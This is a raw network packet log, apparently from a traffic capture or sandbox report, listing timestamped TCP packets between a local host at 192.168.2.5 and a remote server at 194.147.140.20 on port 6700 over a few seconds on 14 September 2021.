Sep 14, 2021 17:03:39.932382107 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932420015 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932446003 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.932459116 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932481050 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932602882 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.932867050 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932893991 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932981968 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932984114 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.933008909 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.933031082 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.933129072 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.933195114 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.933240891 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.933289051 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.933314085 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.933381081 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.933448076 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.933559895 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.933588028 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934320927 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934351921 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934380054 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934401989 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934422970 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.934427023 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934439898 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.934451103 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934474945 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934495926 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934520960 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934542894 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934546947 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.934565067 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934587002 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934593916 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.934613943 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934629917 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.934638023 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934659004 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934680939 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934700966 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.934712887 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.934772968 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934813976 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.934921026 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.935010910 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.935034990 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.935045958 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.935084105 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.935137033 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.118907928 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.118951082 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.118974924 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.119250059 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.119348049 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.119493008 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.119704962 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.119822025 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.119889975 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.119923115 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.120094061 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.120177984 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.121215105 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.121419907 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.121486902 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.121541023 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.121676922 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.121704102 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.121794939 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.122004986 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.122072935 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.122375011 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.122488976 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.122566938 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.123290062 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123331070 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123388052 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123419046 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.123442888 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123471975 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123493910 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123517990 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123596907 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123609066 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.123636961 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123699903 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.123703957 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.123771906 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.124356985 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.124387980 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.124485970 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.124495983 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.124557972 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.124682903 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.124854088 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125221014 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125248909 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125323057 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125343084 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.125427961 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.125489950 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125560999 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125586987 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125703096 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.125729084 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125808001 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.125814915 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125838995 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.125920057 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.125981092 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126118898 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126211882 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.126220942 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126254082 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126317978 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126319885 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.126503944 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126533985 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126583099 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126589060 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.126636982 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126653910 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.126688004 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126744032 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.126749992 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.129637957 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.308780909 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.308912992 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.308984041 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309012890 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309021950 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309047937 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309156895 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309256077 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309281111 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309304953 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309331894 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309400082 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309468985 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309494972 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309568882 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309629917 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309639931 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309662104 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309664011 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309736013 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309787035 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309797049 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309818983 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309822083 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309856892 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309861898 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309886932 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.309890985 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.309952974 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.310775042 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.310877085 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.310955048 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.310991049 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.311021090 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.311044931 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.311619997 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.311651945 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.311712980 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.311733007 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.311829090 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.311892986 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.311918974 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.311935902 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.311975956 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312026024 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312040091 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312055111 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312096119 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312122107 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312136889 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312171936 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312236071 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312253952 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312315941 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312333107 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312390089 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312416077 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312479019 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312537909 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312604904 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312861919 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.312956095 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.312978983 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.313041925 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.313056946 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.313191891 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.316757917 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.316798925 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.316876888 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.316883087 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.316931963 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.316972017 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.316993952 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.317056894 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.317725897 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317761898 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317785978 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317809105 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317831993 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317854881 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317877054 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317900896 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.317903996 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317929029 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317950964 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317974091 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.317989111 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.317996979 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318007946 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318020105 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318039894 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318039894 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318067074 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318099976 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318149090 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318176031 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318216085 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318254948 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318298101 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318444967 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318504095 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318511963 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318567038 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318712950 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318736076 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318790913 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318864107 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318897963 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.318908930 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.318944931 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.319022894 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.319076061 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:40.319150925 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:40.319200993 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:44.246567011 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:44.438302040 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:44.438412905 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:44.438987970 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:44.640640020 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:44.640908003 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:44.831703901 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:44.833177090 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.079094887 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.079169035 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.079291105 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.079303026 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.079327106 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.079436064 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.114960909 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.268596888 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.268661022 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.268723011 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.268783092 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.269140005 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.269197941 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.269215107 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.269217968 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.269239902 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.269243956 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.269260883 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.269280910 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.269282103 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.269301891 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.269346952 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.365976095 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.459414959 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.459459066 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.459494114 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.459585905 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.460218906 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460268974 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460311890 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.460351944 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460422993 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.460505009 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460596085 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460639000 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460675955 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.460704088 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460783958 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.460783958 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460858107 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460905075 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.460942984 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.460980892 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.461057901 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.461066008 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.461146116 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.461224079 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.648952961 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.648988962 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.649071932 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.649094105 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.649291992 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.649362087 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.649430990 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.649570942 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.649616003 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.649671078 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.650053978 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.650296926 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.650346041 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.650367022 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.650382042 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.650423050 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.650518894 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.650579929 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.650727034 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.650804996 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.650872946 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.650886059 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.651046038 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.651115894 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.651315928 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.651448011 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.651473045 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.651515961 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.651575089 CEST	6700	49780	194.147.140.20	192.168.2.5
